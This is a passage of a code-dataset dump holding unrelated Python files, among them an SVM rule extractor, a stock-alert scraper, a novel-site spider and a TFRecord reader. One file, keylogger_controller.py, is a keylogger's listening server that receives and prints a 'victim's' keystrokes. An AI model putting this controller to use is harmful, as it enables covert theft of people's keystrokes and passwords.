pointer.next.prev = pointer\n pointer = pointer.next\n return dummy.next","sub_path":"python/2019/MS/flattenNodesChild.py","file_name":"flattenNodesChild.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105395272","text":"import socket\nimport os\nfrom os import path\n\nif os.name == 'nt':\n from colorama import init\n init(convert=True)\n\nfrom ui_core.coloring import notify\n\nclass Controller:\n def __init__(self, conn_type, port):\n \n notify(\"notify\",\"Making Connection\", \"\")\n \n try:\n self.get_socket(conn_type)\n self.make_the_connection()\n os = self.conn.recv(1024).decode('UTF-8')\n print(f\"Victim is using {os}\")\n notify(\"report\", \"Got Platfrom from victim\", flush=True)\n connected = True\n while connected:\n key = self.conn.recv(1024)\n print(\"{} Pressed : {} \".format(self.address, key))\n\n except:\n connected = False\n notify(\"problem\",\n \"Connection Failed.Victim Might Be Offline Try Again Later\")\n\n def make_the_connection(self):\n self.connection.bind(('', int(port)))\n self.connection.listen()\n self.conn, self.address = self.connection.accept()\n\n def get_socket(self, conn_type):\n if conn_type == \"TCP\":\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n elif Connection_Type == \"UDP\":\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef connect(connection_type: str, port: int):\n Controller(connection_type, port)\n","sub_path":"lib/controllers/keylogger_controller.py","file_name":"keylogger_controller.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528325787","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 10 18:41:43 2018\n\n@author: Alberto Barbado González\n\"\"\"\n\n# Libraries\nimport numpy as np\nimport pandas as pd\nfrom sklearn import svm\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import KMeans\n\n\ndef obtain_centroid(X_train, sc, n_clusters):\n \"\"\"\n Function to obtain the centroid of a group of data points. It uses K-Prototypes algorithm so\n it can work with both numerical and categorical (non ordinal) data.\n \n It returns the centroid/prototype point for that data as well as the assigned clusters for each datapoint.\n \n \"\"\"\n kmeans = KMeans(n_clusters = n_clusters, init= 'k-means++', \n max_iter = 300, n_init = 10, random_state = 0)\n \n labels = kmeans.fit_predict(X_train)\n centroid = kmeans.cluster_centers_\n centroid = sc.inverse_transform(centroid)\n \n return pd.DataFrame({'labels':labels}), pd.DataFrame(centroid)\n\n\ndef obtain_vertices(df_anomalies_no_sub, X_train, sc, n_vertex, numerical_cols, n_clusters):\n \"\"\"\n Function to obtain the vertices from the hypercube of data points contained\n in a dataframe\n \n \"\"\"\n # Drop duplicate rows\n df_anomalies_no_sub = df_anomalies_no_sub.copy().drop_duplicates()\n rule_subgroups = {}\n\n # Obtain centroid to calculate the vertices in case there're enough points\n df_train = pd.DataFrame()\n for col,j in zip(numerical_cols, range(X_train.shape[1])):\n df_train[col] = X_train[:,j]\n \n df_train_no = df_train.copy().loc[list(df_anomalies_no_sub.index)].reset_index(drop=True)\n df_anomalies_no_sub = df_anomalies_no_sub.reset_index(drop=True)\n\n # Obtain centroid for that sub-hypercube\n n = n_clusters\n labels, centroid_no = obtain_centroid(df_train_no, sc, n)\n df_anomalies_no_sub['cluster_label'] = labels\n \n for i in range(n):\n df_no = df_anomalies_no_sub[df_anomalies_no_sub['cluster_label']==i].copy().drop(['cluster_label'],axis=1).reset_index(drop=True)\n # Need at least datapoints for vertices for a number of hypercubes equal to the number of clusters\n if len(df_no) > n_vertex:\n \n # Obtain vertices\n # Euclidean distance of each datapoint to centroid\n df_no['distances'] = np.linalg.norm(df_no[numerical_cols].sub(np.array(centroid_no.loc[i].values.squeeze())), axis=1)\n df_no = df_no.sort_values(by=['distances'], ascending=True)\n \n list_index = list(df_no.head(int(n_vertex/2)).append(df_no.tail(int(n_vertex/2))).index)\n vectors_bound = df_no[df_no.index.isin(list_index)]\n \n centroid = centroid_no.loc[i].values.squeeze()\n\n # In case there's less data in the sub-hypercube than the number of required vertices, all points are selected\n # no need to obtain the centroid\n else:\n print(\"Datapoints = {0} | Few data points in this iteration; using all of them as rules.\".format(len(df_no)))\n vectors_bound = df_no.copy()\n centroid = None\n vectors_bound['distances'] = None\n \n rule_subgroups[i] = [vectors_bound, centroid]\n \n return rule_subgroups\n\n\ndef obtain_limits(df):\n \"\"\"\n # TODO\n \"\"\"\n \n # Obtain limits\n vectors_bound_all = df.copy()\n vectors_bound_all.drop([\"distances\"], axis=1, inplace=True)\n df_bounds_max = vectors_bound_all.max().reset_index().rename(columns={'index':'cat'}).transpose() # df with the max variable values on the hyperplanes\n df_bounds_max.columns = df_bounds_max.loc['cat']\n df_bounds_max = df_bounds_max.reindex(df_bounds_max.index.drop('cat'))\n aux = [col + '_max' for col in df_bounds_max.columns]\n df_bounds_max.columns = aux\n \n df_bounds_min = vectors_bound_all.min().reset_index().rename(columns={'index':'cat'}).transpose() # df with the min variable values on the hyperplanes\n df_bounds_min.columns = df_bounds_min.loc['cat']\n df_bounds_min = df_bounds_min.reindex(df_bounds_min.index.drop('cat'))\n aux = [col + '_min' for col in df_bounds_min.columns]\n df_bounds_min.columns = aux\n \n df_bounds = df_bounds_max.join(df_bounds_min, how='inner')\n \n return df_bounds\n\n\ndef function_check(x,limits,numerical_cols):\n \"\"\"\n True: outside hypercube\n False: not outside hypercube\n \"\"\"\n \n result = False\n for col in numerical_cols:\n l_max = limits[col+'_max'][0]\n l_min = limits[col+'_min'][0]\n \n # If its outside from some of the limits, then its outside the hypercube\n if (x[col] > l_max) or (x[col] < l_min):\n result = True\n \n return result\n\ndef obtain_rules(df_anomalies_no, df_anomalies_yes, X_train, sc, n_vertex_numerical, numerical_cols):\n \"\"\"\n # TODO\n \n \"\"\"\n \n # Obtain vertices\n n = 0\n check = True\n \n # Drop duplicates\n df_anomalies_no.drop_duplicates(inplace=True)\n df_anomalies_yes.drop_duplicates(inplace=True)\n \n while check:\n n += 1\n # Rules\n df_bounds = []\n \n print(\"Iteration {0} | nº clusters used {0}\".format(n))\n dict_vectors_bound_all = obtain_vertices(df_anomalies_no, X_train, sc, n_vertex_numerical, numerical_cols, n_clusters=n)\n \n for key, value in dict_vectors_bound_all.items():\n vectors_bound_all = value[0].copy()\n \n ### Check if cluster is empty - if it's empty, ignore it\n if vectors_bound_all.empty:\n check = False\n continue\n \n #centroid = value[1]\n \n ### Check if a datapoint anomalous would be inside the not anomalous hypercube\n \n # Case where all the points are used as vertices\n if vectors_bound_all['distances'].iloc[0] == None:\n check = False\n df_bounds.append(obtain_limits(vectors_bound_all))\n \n # Case where only some points are used as vertices\n else:\n limits = obtain_limits(vectors_bound_all)\n df_bounds.append(limits)\n \n df_anomalies_yes[\"outside_hcube\"] = df_anomalies_yes.apply(lambda x:function_check(x,limits,numerical_cols), axis=1)\n list_check = list(df_anomalies_yes[\"outside_hcube\"].unique())\n \n # If at least one anomalous point is inside the hypercube, repeat again for ALL points with one more cluster\n if False in list_check:\n check = True\n break # Return to 'while' loop\n else:\n check = False\n \n \n return df_bounds\n\n\ndef print_rules(df_bounds, categorical_cols):\n \"\"\"\n # TODO\n \n \"\"\"\n \n number = 0\n list_rules = []\n \n for i, row in df_bounds.iterrows():\n number += 1\n s = 'Rule Nº {number}: IF '.format(number=number)\n for col, value in zip(row.index, row.values):\n if col in categorical_cols:\n s += '{col} = {value} AND '.format(col=col, value=value)\n elif col[-4:]=='_max':\n s += '{col} <= {value} AND '.format(col=col, value=value)\n else:\n s += '{col} >= {value} AND '.format(col=col, value=value)\n \n s = s[:-4] # delete last AND\n s = s.replace('_max', '').replace('_min', '')\n print(s) \n list_rules.append(s)\n \n \n return list_rules\n \n\n\ndef ocsvm_rule_extractor(dataset_mat, y_labels, numerical_cols, categorical_cols, dct_params):\n \n \"\"\"\n Function to extract rules that justify in a comprehensive way why some data points\n are identified as outliers. The function returns a dataframe with the boundaries that\n define those rules according to the different features used as well as the model trained.\n \n \"\"\"\n \n # Check data quantity\n n_vertex = 2**(len(numerical_cols) + len(categorical_cols))\n n_vertex_numerical = 2**len(numerical_cols)\n \n # Check that there's enough data points to obtain the vertex of the hypercube\n if n_vertex > len(dataset_mat):\n raise ValueError(\"ERROR! Insufficient data points\") \n \n # Scaling numerical data\n sc = StandardScaler()\n \n if len(numerical_cols):\n X_train = dataset_mat[numerical_cols]\n X_train = sc.fit_transform(X_train)\n else:\n X_train = dataset_mat\n \n X_train_model = X_train\n \n for col in categorical_cols:\n X_train_model = np.insert(X_train_model, np.shape(X_train_model)[1], dataset_mat[col].values, axis=1)\n \n # Train OneClassSVM\n model = svm.SVC(gamma='scale')\n model.fit(X_train_model, y_labels)\n \n preds = pd.DataFrame({\"predictions\":list(model.predict(X_train_model))}) \n preds[\"distances\"] = model.decision_function(X_train_model)\n df_anomalies = pd.merge(dataset_mat, preds, left_index=True, right_index=True)\n \n df_anomalies_no = df_anomalies[df_anomalies['predictions']==1].sort_values(by=\"distances\", ascending=True).drop(['predictions', 'distances'], axis=1)\n df_anomalies_yes = df_anomalies[df_anomalies['predictions']==-1].sort_values(by=\"distances\", ascending=True).drop(['predictions', 'distances'], axis=1)\n \n \n # Case 1: Only numerical variables\n if len(categorical_cols) == 0:\n \n # Obtain rules\n df_bounds = obtain_rules(df_anomalies_no, df_anomalies_yes, X_train, sc, n_vertex_numerical, numerical_cols)\n \n # Extract rules\n list_rules_total = []\n print(\"NOT anomaly...\")\n j = 0\n for df in df_bounds:\n j += 1\n print(\"----- Subgroup {0} ------\".format(j))\n list_rules = print_rules(df, categorical_cols)\n list_rules_total.append(list_rules)\n print(\"\")\n \n \n # Case 2: Only categorical variables\n elif len(numerical_cols) == 0:\n df_bounds = df_anomalies_no[categorical_cols].drop_duplicates().reset_index(drop=True)\n \n # Extract rules\n print(\"NOT anomaly...\")\n list_rules = print_rules(df_bounds, categorical_cols)\n \n # Case 3: Numerical + Categorical\n else:\n df_cat = df_anomalies_no[categorical_cols]\n df_cat_unique = df_cat.drop_duplicates()\n df_cat_yes = df_anomalies_yes[categorical_cols]\n df_bounds_all = []\n \n j=0\n for i, row in df_cat_unique.iterrows():\n j += 1\n print(\"Category {0}\".format(j))\n \n # Obtain sub-hypercube (not outliers)\n list_index = df_cat[df_cat[row.index]==row.values].dropna().index # index for that sub-hypercube\n df_anomalies_no_sub = df_anomalies_no[(df_anomalies_no.index.isin(list_index))].copy() # sub-hypercube\n \n # Outliers for this iteration\n list_index_yes = df_cat_yes[df_cat_yes[row.index]==row.values].dropna().index\n df_anomalies_yes_sub = df_anomalies_yes[(df_anomalies_yes.index.isin(list_index_yes))].copy() # outliers for this iteration\n \n # Obtain vertices for this iteration\n df_bounds = obtain_rules(df_anomalies_no_sub[numerical_cols].copy(), df_anomalies_yes_sub[numerical_cols].copy(), X_train, sc, n_vertex_numerical, numerical_cols)\n\n for col in categorical_cols:\n for df in df_bounds:\n df[col] = row[col]\n \n df_bounds_all.append(df_bounds)\n print(\"\")\n \n df_bounds = df_bounds_all\n \n # Extract rules\n i = 0\n list_rules_total = []\n print(\"NOT anomaly...\")\n for rules_cat in df_bounds:\n i += 1\n print(\"*\"*75)\n print(\"Combination of categorical variables Nº {0} \".format(i))\n j = 0\n for df in rules_cat:\n j += 1\n print(\"----- Subgroup {0} ------\".format(j))\n list_rules = print_rules(df, categorical_cols)\n list_rules_total.append(list_rules)\n print(\"\")\n print(\"*\"*75)\n \n return model, df_bounds, df_anomalies\n","sub_path":"lib/supervised_rules.py","file_name":"supervised_rules.py","file_ext":"py","file_size_in_byte":12295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"651041590","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dbtexmf/core/sgmlxml.py\n# Compiled at: 2017-04-03 18:58:57\nimport os, sys, re, logging\nfrom subprocess import call\n\nclass Osx:\n\n def __init__(self):\n self.opts = [\n '-xlower',\n '-xno-nl-in-tag',\n '-xempty',\n '-xno-expand-internal',\n '-xid']\n self.log = logging.getLogger('dblatex')\n\n def replace_entities(self, entfile, mapfile, outfile=None):\n re_ent = re.compile('')\n f = open(entfile)\n lines = f.readlines()\n f.close()\n if not lines:\n return\n ents = []\n for line in lines:\n ents += re_ent.findall(line)\n\n self.log.debug('Entities to map: %s' % ents)\n entpat = '^(%s)\\\\s+[^\\\\s]+\\\\s+0(x[^\\\\s]+)' % ('|').join([ x for x, y in ents ])\n re_map = re.compile(entpat)\n entmap = []\n f = open(mapfile)\n for line in f:\n entmap += re_map.findall(line.split('#')[0])\n\n f.close()\n self.log.debug('Entity map: %s' % entmap)\n entdict = {}\n for ent, uval in entmap:\n entdict[ent] = (\n re.compile('' % ent),\n '' % (ent, uval))\n\n nlines = []\n for line in lines:\n mapped = []\n for ent in entdict:\n reg, rep = entdict[ent]\n line, n = reg.subn(rep, line)\n if n:\n mapped.append(ent)\n\n nlines.append(line)\n for ent in mapped:\n del entdict[ent]\n\n if not outfile:\n outfile = entfile\n f = open(outfile, 'w')\n f.writelines(nlines)\n f.close()\n\n def run(self, sgmlfile, xmlfile):\n errfile = 'errors.osx'\n f = open(xmlfile, 'w')\n rc = call(['osx'] + self.opts + ['-f', errfile, sgmlfile], stdout=f)\n f.close()\n if rc != 0:\n i = 0\n f = open(errfile)\n for line in f:\n sys.stderr.write(line)\n i += 1\n if i == 10:\n break\n\n f.close()\n raise OSError('osx failed')\n sgmlmap = os.path.join(os.path.dirname(__file__), 'sgmlent.txt')\n self.replace_entities('intEntities.dtf', sgmlmap)","sub_path":"pycfiles/dblatex-0.3.10-py2.7/sgmlxml.py","file_name":"sgmlxml.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234255579","text":"# R-4.7 Describe a recursive function for converting a\n# string of digits into the in- teger it represents.\n# For example, 13531 represents the integer 13,531.\n\n\ndef str_to_int(s):\n\n if len(s) == 1:\n return int(s[0])\n\n elif len(s) > 1:\n return str_to_int(s[1:]) + 10 * int(s[0])\n\nif __name__ == '__name__':\n a = str_to_int('122')\n print(a)\n print(type(a))\n","sub_path":"Chapter4_Recursion/str_to_int.py","file_name":"str_to_int.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36239485","text":"import requests\nimport lxml.html as lh\nimport pandas as pd\nimport time\nimport numpy as np\nimport urllib.request\nimport json\nfrom selenium import webdriver\nimport datetime\nimport os\nimport pytz\n\ntz = pytz.timezone('Asia/Kolkata')\n\n\nurl = 'https://www.moneycontrol.com/markets/indian-indices/top-nse-500-companies-list/7?classic=true'\ncount = 0\nglobal prev\nprev = [0 for i in range(500)]\nglobal old\nold = [0 for i in range(500)]\n\npath1 = os.getcwd()\npath = path1 + '/chromedriver'\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--no-sandbox')\noptions.add_argument('--disable-dev-shm-usage')\noptions.add_argument('--headless')\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n#options.add_argument(f'user-agent={userAgent}')\ndriver = webdriver.Chrome(executable_path=path , options=options)\n\n\n\n\n# Alert Function, It is called every 30 seconds.\n\ndef change(present):\n\n time_now = datetime.datetime.now(tz).time()\n data = pd.read_csv('alert.csv')\n data1 = data.copy()\n\n if(time_now= 1.0) & (data['LTP'] > 10.00)]\n data1 = data1[(data1['%Change'] <= -1.0) & (data1['LTP'] > 10.00)]\n\n else: \n percent = [x - y for x, y in zip(present, prev) ]\n #print(percent)\n data = pd.read_csv('alert.csv')\n data1 = data.copy()\n\n #data['Company'] = df['Company']\n #data['LTP'] = list(map(float,list(data['LTP'].apply(lambda x: x.replace(',','')))))\n data['%Change'] = percent\n data['Previous Value'] = prev\n data['Present Value'] = present\n #data['Volume'] = df['Volume']\n\n #data1['Company'] = df['Company']\n #data1['LTP'] = list(map(float,list(data1['LTP'].apply(lambda x: x.replace(',','')))))\n data1['%Change'] = percent\n data1['Previous Value'] = prev\n data1['Present Value'] = present\n #data1['Volume'] = df['Volume']\n\n data = data[(data['%Change'] >= 1.0) & (data['Volume'] > 100000) & (data['LTP'] > 10.00)]\n data1 = data1[(data1['%Change'] <= -1.0) & (data1['Volume'] > 100000) & (data1['LTP'] > 10.00)]\n\n data.sort_values(\"%Change\", axis = 0, ascending = True, inplace = True, na_position ='last')\n data1.sort_values(\"%Change\", axis = 0, ascending = True, inplace = True, na_position ='last') \n \n return data,data1\n\n#This function returns the table of the given url\n\ndef Real(url,count):\n\n if count == 0:\n \n driver.get(url)\n\n else:\n driver.refresh()\n time.sleep(3)\n\n infile = driver.page_source\n doc = lh.fromstring(infile)\n tr_elements = doc.xpath('//tr')\n tr_elements = tr_elements[1:502]\n\n\n #print([len(T) for T in tr_elements[:]])\n col=[]\n i=0#For each row, store each first element (header) and an empty list\n for t in tr_elements[0]:\n i+=1\n name=t.text_content().strip()\n #print('%d:\"%s\"'%(i,name))\n col.append((name,[]))\n\n\n for j in range(1,len(tr_elements)):\n #T is our j'th row\n T=tr_elements[j]\n \n #If row is not of size 500, the //tr data is not from our table \n if len(T)!=8:\n break\n \n #i is the index of our column\n i=0\n \n #Iterate through each element of the row\n for t in T.iterchildren():\n data=t.text_content() \n #Check if row is empty\n if i>0:\n #Convert any numerical value to integers\n try:\n data=int(data)\n except:\n pass\n #Append the data to the empty list of the i'th column\n col[i][1].append(data)\n #Increment i for the next column\n i+=1\n\n #print([len(C) for (title,C) in col])\n Dict={title:column for (title,column) in col}\n df=pd.DataFrame(Dict)\n df['LTP'] = df['LTP'].apply(lambda x: x.replace(',',''))\n df['LTP'] = df['LTP'].apply(lambda x: pd.to_numeric(x,errors='coerce'))\n df['Volume'] = df['Volume'].apply(lambda x: pd.to_numeric(x,errors='coerce'))\n df = df.drop(['Buy Price', 'Sell Price', 'Buy Qty', 'Sell Qty'],axis= 1)\n df.dropna(inplace=True)\n return df\n\ntime_now = datetime.datetime.now(tz).time()\nwhile(datetime.time(9, 14, tzinfo=tz) < time_now < datetime.time(16, 1, tzinfo=tz)):\n\n try:\n df = Real(url,count)\n df.to_csv('alert.csv',index=False)\n \n count+=1\n\n if(count !=1): #1st loop is ignored\n Result,Result1 = change(list(map(float,list(df['%Change']))))\n\n if(not Result.empty and count !=1):\n #print('#'*50)\n print(\"Alert! Increased\")\n #print(' ')\n print(Result)\n #print('#'*50)\n #print(' ')\n Result.to_json('Increase_alert.json', orient='records')\n\n\n if(not Result1.empty and count !=1):\n #print('#'*50)\n print(\"Alert! Decreasing\")\n #print(' ')\n print(Result1)\n #print('#'*50)\n #print(' ')\n Result1.to_json('Decrease_alert.json', orient='records')\n \n if(Result.empty and count !=1):\n a= [{}]\n with open('Increase_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n \n if(Result1.empty and count !=1):\n a= [{}]\n with open('Decrease_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n\n \n time_now = datetime.datetime.now(tz).time()\n\n \n\n\n\n prev = df['%Change']\n #By default the values are turned into str, so to convert to float we use the below statement\n prev = list(map(float,list(prev)))\n #print(prev)\n\n #Count Down for 60 seconds\n t = 60\n while t>=0:\n mins,secs = (00,t)\n timer = '{:02d}:{:02d}'.format(mins,secs)\n #print(timer)\n time.sleep(1)\n t -= 1\n \n time_now = datetime.datetime.now(tz).time()\n\n except KeyboardInterrupt:\n break\n\nif(time_now>=datetime.time(16, 1, tzinfo=tz) == True):\n print('Market Closed')\n a= [{}]\n with open('Increase_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n\n with open('Decrease_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n#Press stop button to stop the loop\n#Look at try.csv for nify500 data \n","sub_path":"NLP_api/Real_time_alert.py","file_name":"Real_time_alert.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205936276","text":"# Permuted multiples\nfrom time import time\n\nstart = time()\n\n\ndef pf(num): # comparison preparation function\n # return set(str(num)) # it's a little faster but not an exact solution\n return ''.join(sorted(str(num)))\n\n\ndef e52():\n smax = '16666'\n while True:\n smax += '6'\n for n in range(10 ** (len(smax) - 1) + 2, int(smax), 3): # n must be divisible by 3\n if pf(n) == pf(n * 2) == pf(n * 3) == pf(n * 4) == pf(n * 5) == pf(n * 6):\n return n\n\n\nprint('Answer =', e52()) # 142857\nprint('Runtime =', time() - start)\n","sub_path":"euler52_Permuted_multiples.py","file_name":"euler52_Permuted_multiples.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493743479","text":"import scrapy, re\nfrom test001.items import BookItem\nimport include_book_walker\n\nclass qiushubang(include_book_walker.CBookWalker):\n\tname = \"qiushubang\"\n\tallowed_domains = [\"qiushubang.com\"]\n\tstart_urls = [\n\t\t\"https://www.qiushubang.com/124800/\",\n\t\t\"https://www.qiushubang.com/141780/\",\n\t\t\"https://www.qiushubang.com/135013/\",\n\t\t\"https://www.qiushubang.com/140562/\",\n\t\t\"https://www.qiushubang.com/135345/\",\n\t\t\"https://www.qiushubang.com/135206/\",\n\t\t\"https://www.qiushubang.com/164344/\",\n\t\t\"https://www.qiushubang.com/137718/\",\n\t\t\"https://www.qiushubang.com/135038/\",\n\t\t\"https://www.qiushubang.com/135127/\",\n\t\t\"https://www.qiushubang.com/135212/\",\n\t\t\"https://www.qiushubang.com/135456/\",\n\t\t\"https://www.qiushubang.com/133604/\",\n\t\t\"https://www.qiushubang.com/142124/\",\n\t\t\"https://www.qiushubang.com/135455/\",\n\t\t\"https://www.qiushubang.com/135238/\",\n\t\t\"https://www.qiushubang.com/135568/\",\n\t\t\"https://www.qiushubang.com/5721/\",\n\t\t\"https://www.qiushubang.com/141895/\",\n\t\t\"https://www.qiushubang.com/134991/\",\n\t\t\"https://www.qiushubang.com/135141/\",\n\t\t\"https://www.qiushubang.com/163429/\",\n\t\t\"https://www.qiushubang.com/31377/\",\n\t\t\"https://www.qiushubang.com/135004/\",\n\t\t\"https://www.qiushubang.com/140416/\",\n\t]\n\t\n\tcustom_settings = {\n\t\t\"DEPTH_PRIORITY\" : -1,\n\t\t\"RETRY_TIMES\" : 9,\n\t\t\"DOWNLOAD_DELAY\" : 3,\n\t\t\"COOKIES_ENABLES\" : False,\n\t\t\"COOKIES_ENABLED\" : False,\n\t\t\n\t\t# 这网站打开超慢\n\t\t\"DOWNLOAD_TIMEOUT\" : 60,\n\t}\n\t\n\t# 代理,这网站速度巨慢\n\t# proxy = \"http://127.0.0.1:7135\"\n\t\n\tbase_same_title = 1\n\tcached_chapters = {}\n\t\n\tdef parse(self, response):\n\t\tcur_header = self.header.copy()\n\t\tcur_header[\"Referrer\"] = response.url\n\t\tprint(\"当前页面:{}\".format(response.url))\n\t\t\n\t\tif not response.xpath(r\"//div[@class='detail']\"):\n\t\t\tprint(\"错误:这个页面 {} 不是书本信息。\".format(response.url))\n\t\t\treturn None\n\t\t\n\t\titem = BookItem()\n\t\titem[\"book_title\"] = response.xpath(r\"//meta[@property='og:title']/@content\").extract_first()\n\t\titem[\"book_author\"] = response.xpath(r\"//meta[@property='og:novel:author']/@content\").extract_first()\n\t\titem[\"book_description\"] = response.xpath(r\"//meta[@property='og:description']/@content\").extract_first()\n\t\titem[\"book_type\"] = response.xpath(r\"//meta[@property='og:novel:category']/@content\").extract_first()\n\t\titem[\"book_cover\"] = response.xpath(r\"//meta[@property='og:image']/@content\").extract_first()\n\t\titem[\"book_finish\"] = response.xpath(r\"//meta[@property='og:novel:status']/@content\").extract_first()\n\t\titem[\"book_lastupdate\"] = response.xpath(r\"//meta[@property='og:novel:update_time']/@content\").extract_first()\n\t\t\n\t\tunique = self.proccess_book_info(item, response.url)\n\t\tchapterList = list(reversed(response.xpath(r\"//div[@class='chapterCon']/ul/li/a/@href\").extract()))\n\t\tchapterTitle = list(reversed(response.xpath(r\"//div[@class='chapterCon']/ul/li/a/text()\").extract()))\n\t\t\n\t\t# www 开头的太慢了,而且还有章节内容塞图片的操作,换成手机版的吧\n\t\turl_base = response.url.replace(\"//www.\", \"//wap.\").replace(\"//m.\", \"//wap.\")\n\t\tfor i in range(len(chapterList)):\n\t\t\tchapterList[i] = self.fix_url(chapterList[i], url_base)\n\t\tcur_header[\"Referrer\"] = cur_header[\"Referrer\"].replace(\"/www.\", \"/wap.\")\n\t\tcur_header[\"User-Agent\"] = \"NOKIA5700/ UCWEB7.0.2.37/28/999\"\n\t\t\n\t\t# chapterList = [x for x in chapterList if x.find(\".html\") > -1]\n\t\treturn self.proccess_chapter_list(unique, chapterList, self.parse_chapter, response.url, chapterTitle)\n\t#end - parse\n\t\n\tdef parse_chapter(self, response):\n\t\theader = self.header.copy()\n\t\theader[\"Referrer\"] = response.url\n\t\t\n\t\tif not response.xpath(r\"//div[@class='readerCon']\") and not response.xpath(r\"//div[@class='nr_title']\"):\n\t\t\tprint(\"错误:这个页面 {} 不是书本章节。\".format(response.url))\n\t\t\treturn None\n\t\t\n\t\tchapterTitle = response.xpath(r\"//div[@class='articleTitle']/h2/text()\").extract_first() or response.xpath(r\"//div[@id='nr_title']/text()\").extract_first()\n\t\tchapterContext = \"\\n\".join(response.xpath(r\"//div[@class='articleCon']/p/text()\").extract() or response.xpath(r\"//div[@id='nr1']/text()\").extract())\n\t\t\n\t\t# 删除垃圾内容\n\t\tchapterTitle = re.sub(r\"\\(\\d+/\\d+\\)$\", \"\", chapterTitle.strip())\n\t\tchapterContext = chapterContext.replace(\"【重要提醒】使用百度APP看小说的,切记要取消畅读模式,否则求书帮上的最新小说章节会只显示一半\", \"\")\n\t\t\n\t\t# 翻页处理\n\t\tunique = re.search(r\"(/\\d+/\\d+)[_\\.]\", response.url).group(1)\n\t\tnp = response.xpath(\"//a[text()='下一页']/@href\").extract_first()\n\t\tif np:\n\t\t\tif unique not in self.cached_chapters:\n\t\t\t\tself.cached_chapters[unique] = chapterContext\n\t\t\telse:\n\t\t\t\tself.cached_chapters[unique] += chapterContext\n\t\t\t#end if\n\t\t\t\n\t\t\tnp = self.fix_url(np, response.url)\n\t\t\tif np != response.url:\n\t\t\t\treturn scrapy.Request(\n\t\t\t\t\tnp,\n\t\t\t\t\tcallback = self.parse_chapter,\n\t\t\t\t\theaders = header,\n\t\t\t\t\tmeta = response.meta,\n\t\t\t\t\tpriority = 10\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tself.logger.error(\"翻页次数超过上限:\" + np)\n\t\t#end if\n\t\t\n\t\tif unique in self.cached_chapters:\n\t\t\tchapterContext = self.cached_chapters[unique] + chapterContext\n\t\t\tdel self.cached_chapters[unique]\n\t\t#end if\n\t\t\n\t\timage = response.xpath(r\"//div[@class='articleCon']/p/img/@src\").extract_first()\n\t\tif image:\n\t\t\tself.logger.warning(\"{} 需要进行图像识别\".format(response.url))\n\t\t\n\t\treturn self.proccess_chapter(chapterTitle, chapterContext, response.meta, self.remove_page_mark(response.url))\n\t#end - parse_chapter\n#end - qiushubang\n","sub_path":"test001/spiders/qiushubang.py","file_name":"qiushubang.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"375539761","text":"import tensorflow as tf\nimport pdb\n\nreader = tf.TFRecordReader()\nfilename = \"train--.tfrecord\"\nfilename_queue = tf.train.string_input_producer([filename], num_epochs = 1)\n_, serialized_example = reader.read(filename_queue)\n\ncontexts, features = tf.parse_single_sequence_example(\n\tserialized_example,\n\tcontext_features={\n\t\t'video_id': tf.FixedLenFeature([], tf.string),\n\t\t'labels': tf.VarLenFeature(tf.int64)\n\t},\n\tsequence_features = {\n\t\tfeature_name: tf.FixedLenSequenceFeature([], dtype = tf.string)\n\t\tfor feature_name in ['rgb', 'audio']\n\t})\nfeatures['rgb'] = tf.reshape(tf.cast(tf.decode_raw(features['rgb'], tf.uint8), tf.float32), [-1, 1024])\nfeatures['audio'] = tf.reshape(tf.cast(tf.decode_raw(features['audio'], tf.uint8), tf.float32), [-1, 128])\nsess = tf.Session()\ninit = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) \nsess.run(init)\ntf.train.start_queue_runners(sess=sess)\ni = 0\nwhile i > -1:\n\t[features_1, features_2, labels] = sess.run(features.values() + [contexts['labels']])\n\ti += 1\n\tprint(i, labels)\n\tprint(features_1.shape)\n","sub_path":"Utils/dataPrepare.py","file_name":"dataPrepare.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586780103","text":"import tempfile\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom pytest_postgresql import factories\nfrom models import ParsedText\nimport pytest\n\n\nsocket_dir = tempfile.TemporaryDirectory()\npostgresql_my_proc = factories.postgresql_proc(port=None, unixsocketdir=socket_dir.name)\npostgresql_my = factories.postgresql(\"postgresql_my_proc\")\n\n\n@pytest.fixture(scope=\"function\")\ndef setup_database(postgresql_my):\n def dbcreator():\n return postgresql_my.cursor().connection\n\n engine = create_engine(\"postgresql+psycopg2://\", creator=dbcreator)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n yield session\n session.close()\n\n\ndef test_postgres_options(postgresql):\n \"\"\"Ensure max connections exists\"\"\"\n cur = 